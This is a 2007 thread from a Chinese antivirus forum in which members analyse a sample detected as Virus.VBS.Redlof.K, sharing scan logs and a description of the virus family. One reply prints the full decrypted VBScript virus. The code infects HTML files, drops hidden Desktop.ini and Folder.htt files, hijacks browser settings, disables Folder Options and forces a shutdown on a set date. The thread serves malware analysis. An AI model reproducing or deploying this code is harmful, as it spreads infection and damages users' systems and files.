查看: 2906|回复: 11
收起左侧

[可疑文件] 哪位来解下密

[复制链接]
promised
发表于 2007-10-2 18:16:41 | 显示全部楼层 |阅读模式

'Virus.VBS.Redlof.K'

[ 本帖最后由 promised 于 2007-10-2 18:19 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Nerazzurri
发表于 2007-10-2 18:20:51 | 显示全部楼层
Starting the file scan:

Begin scan in 'F:\Documents and Settings\kafan\桌面\1.zip'
F:\Documents and Settings\kafan\桌面\1.zip
  [0] Archive type: ZIP
  --> 1.htm
      [DETECTION] Contains detection pattern of the VBS script virus VBS/Redlof.K
      [INFO]      The file was deleted!
xffsfy
发表于 2007-10-2 18:33:29 | 显示全部楼层
瑞星抓到了....Backdoor.ASP.Ace.uv
king6808
发表于 2007-10-2 19:14:19 | 显示全部楼层
2007-10-2 19:11:41        文件: F:\10.2\1.zip/1.htm        检测到病毒 'Virus.VBS.Redlof.k'       
2007-10-2 19:11:41        文件: F:\10.2\1.zip/1.htm        已删除
lovewei
发表于 2007-10-2 19:17:06 | 显示全部楼层
解密出来:
<Script Language="VBScript">On Error Resume Next
Const AppletName="vbs.icarOs.2.0.0"
Const AppletCode="com.ms.activeX.ActiveXComponent"
Const fsoCLSID="{0D43FE01-F093-11CF-8940-00A0C9054228}"
Const wsCLSID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"
document.write"<applet height=0 width=0 name="&AppletName&" code="&AppletCode&"></applet>"
document.write"<script for=window event=onload>setTimeOut""vbscript:mainv2_onload()"",1000</script>"
Sub mainv2_onload()
RegChange()
DropTemplate(TemplateDir)
DropTemplate(ThisDirPath)
DropMisc()
FileScan(ThisDirPath)
PLoadCheck()
End Sub
Sub DropMisc()
On Error Resume Next
For n=0 to 1
DropTemplate(fso.GetSpecialFolder(n)&"\")
Next
For Each d in fso.Drives
If d.DriveType=2 then DropTemplate(d.DriveLetter&":\")
Next
For Each n in WshShell.SpecialFolders
If InStr(n,"Desktop")=0 Then DropTemplate(n&"\")
Next
End Sub
Sub PLoadCheck()
On Error Resume Next
If Month(Now)=9 and Day(Now)=26 then WshShell.Run("RUNDLL32.EXE shell32.dll,SHExitWindowsEx 2")
End Sub
Sub FileAppend(f,c)
On Error Resume Next
Set myFile=fso.GetFile(f)
n=myFile.Attributes
myFile.Attributes=0
Set myFile=fso.OpenTextFile(f,8)
myFile.Write c
myFile.Close
FileAttr f,n
End Sub
Sub FileInfect(p)
On Error Resume Next
Set f=fso.OpenTextFile(p,1)
c=f.ReadAll
f.Close
If InStrRev(c,vCode)=0 Or InStrRev(c,vCode)+Len(vCode)<Len(c) Then
FileAppend p,vCode
End If
End Sub
Sub FileScan(p)
On Error Resume Next
For Each sf1 In fso.GetFolder(p).Files
Select Case LCase(fso.GetExtensionName(sf1.Name))
Case "htm","html","htt"
FileInfect(sf1.Path)
End Select
Next
End Sub
Function vCode()
On Error Resume Next
nCode=Replace(QueryString,chr(34),chr(34)&chr(34))
DropMe=Array("<"&"Script Language=""VBScript""><"&chr(33)&"--","QueryString="""&nCode&"""","document.write""<""&""Script Language=""""VBScript"""">""&QueryString&""</""&""Script>""","--"&"></"&"Script>")
vCode=Join(DropMe,Chr(10))
End Function
Sub RegChange()
On Error Resume Next
AE="http://www.geocities.com/abouterror/index.htm"
SP="about:error"
HCU="HKEY_CURRENT_USER\"
SM="Software\Microsoft\"
HLM="HKEY_LOCAL_MACHINE\"
WC="Windows\CurrentVersion\"
PE="Policies\Explorer\"
IE="Internet Explorer\"
S=HCU&SM&IE&"Main\Start Page"
A=HLM&SM&IE&"AboutURLs\error"
E=HLM&SM&WC&"ExtShellViews\{5984FFE0-28D4-11CF-AE66-08002B2E1262}\"
N=HLM&SM&WC&PE&"NoFolderOptions"
H=HCU&SM&WC&"Explorer\Advanced\Hidden"
C=HCU&SM&WC&PE&"ClassicShell"
With WshShell
DW="REG_DWORD"
SZ="REG_SZ"
.RegWrite S,SP,SZ
.RegWrite A,AE,SZ
.RegWrite N,1,DW
.RegWrite H,0,DW
.RegWrite C,0,DW
.RegDelete E
End With
End Sub
Function ThisDirPath()
On Error Resume Next
p=Replace(UnEscape(document.location),"file:///","")
If fso.FileExists(p) Then
p=Replace(p,fso.GetFileName(p),"")
Else
If Not(Len(p)<=3) Then p=p&"/"
End If
ThisDirPath=p
End Function
Function TemplateDir()
On Error Resume Next
p=fso.GetSpecialFolder(0)&"\Web"
fso.DeleteFolder p,True
fso.CreateFolder(p)
Set myFile=fso.GetFolder(p)
myFile.Attributes=7
TemplateDir=p&"\"
End Function
Sub DropTemplate(path)
On Error Resume Next
FolderHTT="<html><body scroll=no style=margin:0><object classid=clsid:1820FED0-473E-11D0-A96C-00C04FD705A2 style=width:100%;height:100%></object></body></html>"
iniLine=array("[ExtShellFolderViews]","Default={5984FFE0-28D4-11CF-AE66-08002B2E1262}","{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}","","[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]","PersistMoniker=file://Folder.htt","","[.ShellClassInfo]","ConfirmFileOp=0")
DesktopINI=Join(iniLine,VbCrLf)
p=path&"Desktop.ini"
FileCreate p,DesktopINI
FileAttr p,7
p=path&"Folder.htt"
FileCreate p,FolderHTT & vCode
FileAttr p,7
End Sub
Sub FileCreate(filename,contents)
On Error Resume Next
FileAttr filename,0
Set myFile=fso.CreateTextFile(filename,True)
myFile.Write contents
myFile.Close
End Sub
Sub FileAttr(filename,attr)
On Error Resume Next
Set myFile=fso.GetFile(filename)
myFile.Attributes=attr
End Sub
Function AppObj()
On Error Resume Next
Set AppObj=document.applets(AppletName)
End Function
Function fso()
On Error Resume Next
Set fso=CreateObj(fsoCLSID)
End Function
Function WshShell()
On Error Resume Next
Set WshShell=CreateObj(wsCLSID)
End Function
Function CreateObj(CLSID)
On Error Resume Next
AppObj.SetCLSID(CLSID)
AppObj.createInstance()
window.status=""
Set CreateObj=AppObj.GetObject()
End Function</Script>
fsr717af
发表于 2007-10-2 19:45:21 | 显示全部楼层
看不懂   谁帮忙翻译下 楼上的
wangjay1980
发表于 2007-10-2 21:59:50 | 显示全部楼层
detected: virus Virus.VBS.Redlof.k        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\1.zip/1.htm
shixinlong044
发表于 2007-10-3 01:28:37 | 显示全部楼层
FSIS控制,直接下载不下来
jimmyleo
发表于 2007-10-3 15:38:16 | 显示全部楼层
先来些资料

HTML.Redlof.A 是一种多态、加密的 Visual Basic 脚本病毒,会感染所有驱动器上的 .html、.htm、.asp、.php、.jsp 和 .vbs 文件。该病毒将自身复制到 %windir%\System\Kernel.dll 或 %windir%\System\Kernel32.dll,这取决于 Windows System 文件夹的位置。它会更改 .dll 文件的默认关联。
jimmyleo
发表于 2007-10-3 17:07:13 | 显示全部楼层
第一层 自写函数 貌似是正则?
第二层 encode
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-18 19:46 , Processed in 0.125438 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表